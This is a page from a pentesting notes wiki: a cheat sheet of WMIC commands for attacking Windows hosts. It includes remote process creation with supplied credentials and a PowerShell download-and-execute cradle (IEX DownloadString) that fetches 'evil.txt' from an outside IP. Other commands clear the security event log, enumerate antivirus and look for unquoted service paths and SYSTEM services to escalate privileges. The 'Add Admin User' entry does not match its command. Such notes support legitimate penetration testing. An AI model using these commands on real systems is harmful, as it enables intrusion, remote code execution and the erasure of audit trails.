From BHaFSec Pentesting Notes Wiki
- 1 Add Admin User Remotely
- 2 Find all AD accounts whose password is set to never expire:
- 3 From a Windows command prompted spawned with "shell" in Meterpreter, use WMIC to remotely execute a Powershell command to download and run a Powershell script:
- 4 List services running as SYSTEM & possibly weak file perms:
- 5 List unquoted service paths
- 6 List Which Antivirus is installed
- 7 List autoruns
- 8 Get MAC Address
- 9 Clear Event Log
- 10 total number of logons for user
- 11 Service Changing
- 12 Check Machines for patches
- 13 Check for disabled accounts
- 14 kill process
- 15 Account info
Add Admin User Remotely
wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user”
Find all AD accounts whose password is set to never expire:
wmic UserAccount where PasswordExpires=False get Name
From a Windows command prompted spawned with "shell" in Meterpreter, use WMIC to remotely execute a Powershell command to download and run a Powershell script:
wmic /User:"Domain\User" /Password:"thepasswordlol" /Node:"184.108.40.206" process call create "powershell.exe -exec bypass -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://220.127.116.11/evil.txt');\""
List services running as SYSTEM & possibly weak file perms:
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
List unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,startmode,pathname | findstr /i /v ":\windows\\" | findstr /v """
List Which Antivirus is installed
wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * wmic /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathtoSignedProductExe
wmic startup list full wmic startup list brief | find /i "hklm"
Get MAC Address
wmic nic get macaddress
Clear Event Log
wmic nteventlog where (description like "%secevent%") call cleareventlog
total number of logons for user
wmic netlogin where (name like "%skodo") get numberoflogons
wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled
Check Machines for patches
wmic /node:box.domain.com qfe where "not description like " get description,hotfixid,installedon
Check for disabled accounts
wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"
wmic process where name='cmd.exe' delete wmic process [pid] delete